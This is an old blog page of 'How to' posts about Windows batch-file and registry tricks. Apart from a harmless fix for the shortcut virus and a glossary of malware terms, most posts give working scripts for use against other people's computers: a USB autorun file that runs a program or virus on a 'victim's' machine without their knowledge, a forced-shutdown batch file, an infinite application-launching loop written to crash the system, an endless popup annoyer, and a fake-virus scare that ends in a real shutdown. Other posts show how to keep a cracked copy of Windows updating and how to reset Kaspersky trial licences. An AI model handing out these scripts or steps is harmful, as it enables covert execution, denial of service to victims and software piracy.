Showing posts with label How to. Show all posts
Showing posts with label How to. Show all posts

Sunday, 23 November 2014

How to Remove Shortcut Virus From Pendrive

Remove Shortcut Virus From Pendrive


One such frustrating virus is well known ‘shortcut virus’. 


Antivirus software may detect the virus but can’t delete it from USB drive.


When ever the USB affected with shortcut virus,every piece of  data in it is shown as shortcut and Some time it will not be opened.





Now how to recover data and remove the virus:-


Step 1: Open CMD. (start > Run > cmd)

Step 2: now type:- attrib -h -r -s /s /d G:\*.*    
    
    "(G: is my USB drive letter. Replace with your USB letter)"

Step 3: Enter

Now Check your data....and Enjoy!!!!!!!!!!

You're Done!

Sunday, 16 November 2014

How to Shutdown friend's computer

How to shutdown friend's computer



Open notepad and write this program.



@ echo off
Shutdown -s -t 00



Save this file as a '.bat' file.
Start this program in friend's pc
You can also do this anonymously by USB. 
For this we need to buid a autorun.inf


Make a autorun.inf


Open notepad
[autorun]
start=filename.bat
action= start my application
Save this file as a "autorun.inf"
Put "autorun.inf" and ".bat" files in USB and give it to your friend.

Saturday, 15 November 2014

how to automatically install program(or a virus) into someone's computer using USB?

How to automatically install program(or a virus) into someone's computer using USB?

 I am gonna show you how to make a autorun.inf.

Steps

1. open a notepad.
 

2.type this codes
 

3.[autorun]
   open=program name.extension

   Action=start my application
 

4.save it as a "autorun.inf"

(if in your program name has a space so replace space with "_".)


Now copy autorun.inf file and a program into pendrive and give it to victim.when victim insert pendrive into system the program(or a virus) will be installed anonymously in victim's system.

"I am not responsible for what you gonna do with this information."

Thursday, 13 November 2014

How to update windows without losing crack

How to Update Windows without losing Crack



1.Launch Regedit.

2.Go down to HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion.

3.Look for a value named RegDone. If it isn't there create a new key with this value.
{Value Name: RegDone
Data Type: REG_SZ (String Value)
Value Data: (0 = disabled, 1 = enabled)}

4.Right click the new value and choose Modify. Make the value 1.
 
5.Close Regedit and
 
6.Enjoy!

Wednesday, 12 November 2014

How to Make an Application bomber

How to Make an Application bomber

How to open up many applications continuously using a loop.

 "oops! it will make the system crash immediately."

Write this program in notepad and Save as a ".bat"

@echo off
:loop
start notepad
start winword
start mspaint
start write
start cmd
start explorer
start control
start calc
goto loop

When the above given batch program is executed, it will open up the following applications such as notepad, word document, Microsoft paint, WordPad, command prompt, my documents, control panel, and calculator in an infinite loop causing the system to collapse and as a result the system simply crashes or reboots.

"I am not responsible for what you do with this Information"

How to make a fake virus

How To Make a Fake Virus

Fool your friends into thinking that their computer has a virus.


Write the program in notepad


@echo off
title Cyber Attack Sequence Initiation
color 02
echo Warning-Complete File Corruption imminent.
timeout /t 3 /nobreak >nul
CLS
echo Complete file corruption and computer shutdown in 10
timeout /t 1 /nobreak >nul
ClS
echo Complete file corruption and computer shutdown in 9
timeout /t 1 /nobreak >nul
ClS
echo Complete file corruption and computer shutdown in 8
timeout /t 1 /nobreak >nul
CLS
echo Complete file corruption and computer shutdown in 7
timeout /t 1 /nobreak >nul
CLS
echo Complete file corruption and computer shutdown in 6
timeout /t 1 /nobreak >nul
CLS
echo Complete file corruption and computer shutdown in 5
timeout /t 1 /nobreak >nul
CLS
echo Complete file corruption and computer shutdown in 4
timeout /t 1 /nobreak >nul
CLS
echo Complete file corruption and computer shutdown in 3
timeout /t 1 /nobreak >nul
CLS
echo Complete file corruption and computer shutdown in 2
timeout /t 1 /nobreak >nul
CLS
echo Complete file corruption and computer shutdown in 1
timeout /t 1 /nobreak >nul
CLS
echo File corruption and computer shutdown initiated
timeout /t 3 /nobreak >nul
CLS
echo Corrupting Critical System Files...
echo del* *
timeout /t 2 /nobreak >nul
echo The System cannot find the file specified.
echo:
echo:
echo:
echo:
echo:
echo Corrupting Root Partition...
echo del C:\Windows
timeout /t 2 /nobreak >nul
echo Deletion Successful!
echo:
echo:
echo:
echo:
echo:
echo:
echo:
echo Disabling Windows Firewall...
echo Killing all processes...
timeout /t 2 /nobreak >nul
echo Allowing virus to boot from startup...
timeout /t 2 /nobreak >nul
echo:
echo:
echo:
echo:
echo:
echo Virus has been executed successfully!
echo:
echo:
echo Have Fun!
timeout /t 2 /nobreak >nul
shutdown -s -t 45 /c Your computer has committed suicide. Have a nice day.

save as a ".bat" file

At the end of the program a
message will pop up that says "Your computer has committed suicide.
Good-bye". Then the computer will shutdown. 


Monday, 10 November 2014

continuous pop up messages

Continuous pop-up Messages

Message annoyer is a batch program.
It will interact with the user anyhow annoying and irritating them by popping up some message box containing some
messages in it.

Open Notepad.exe and write this batch program and save it as ".bat".

@echo off
:annoy
msg * Hi there!
msg * How u doin ?
msg * Are you fine ?
msg * Never mind about me....
msg * I am not here to annoy you....
msg * I am caring for you.....
msg * start counting from 1 to 5, i Will be outta this place.....
msg * 1
msg * 2
msg * 3
msg * 4
msg * 5
goto annoy

This program will pops up a small message box as shown below,



Containing the text mentioned in the program given above.
 
This message box will pop up until for endless loop, which really annoys the person sitting before the
computer. Even these small popup windows may crash the computer, if it overloads the memory.

"I am not responsible for what you do with this Information"

Friday, 7 November 2014

What is a trojan/worm/virus/logic bomb?

What is a trojan/worm/virus/logic bomb?





Trojan:


     Remember the Trojan Horse? Bad guys hid inside it until they could get into the city to do their evil deed. A trojan computer program is similar. It is a program which does an unauthorized function, hidden inside an authorized program. It does something other than what it claims to do, usually something malicious (although not necessarily!), and it is intended by the author to do whatever it does. If it's not intentional, its called a 'bug' or, in some cases, a feature :)

Virus:


     A virus is an independent program which reproduces itself. It may attach to other programs, it may create copies of itself (as in companion viruses). It may damage or corrupt data, change data, or degrade the performance of your system by utilizing resources such as memory or disk space.

Worm:


     Made famous by Robert Morris, Jr. , worms are programs which reproduce by copying themselves over and over, system to system, using up resources and sometimes slowing down the systems. They are self contained and use the networks to spread, in much the same way viruses use files to spread.

Logic Bomb:


     Code which will trigger a particular form of 'attack' when a designated condition is met. For instance, a logic bomb could delete all files. Unlike a virus, a logic bomb does not make copies of itself.

How to crack kaspersky antivirus manually

How to crack kaspersky antivirus manually

 


(A). At first, Delete any old key (if there is a key in kaspersky)

(B). Now, Disable Self Defense (Go to Settings>In Option>Turn off Self Defense and Click Ok )

(C). Now, Goto Start menu, Click Run and Type "regedit". 

Go to :HKEY_LOCAL_MACHINE\SOFTWARE\KasperskyLab\protected\AVP9\environment(For 32bit OS: - windows xp or vista or windows 7)

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\KasperskyLab\protected\AVP9\environment(For 64bit OS: - windows xp or vista or windows 7)


(D). Now, Right look for PCID and right click and modify three or four last numbers or letters, a example is : (8F10C22F-6EF6-4378-BAB1-34722F6D454)and enter any other three-letter, four-number and close Registry Editor Now.
(E). Go to Taskbar and Right Click the kaspersky Icon and click Exit.

(F). Go to start programs and open kaspersky. when you activate searching trial license and you have a new license key for month.

(G). Go to kaspersky settings and Enable (turn on) Self Defense.

 

"After 30 days, when your license expire, go to step 1 to 7 and get a new 30 days license from kaspersky server automatically."

"this is a tricks what is done a few minutes and give you a new trial license. so it is better to find a license key."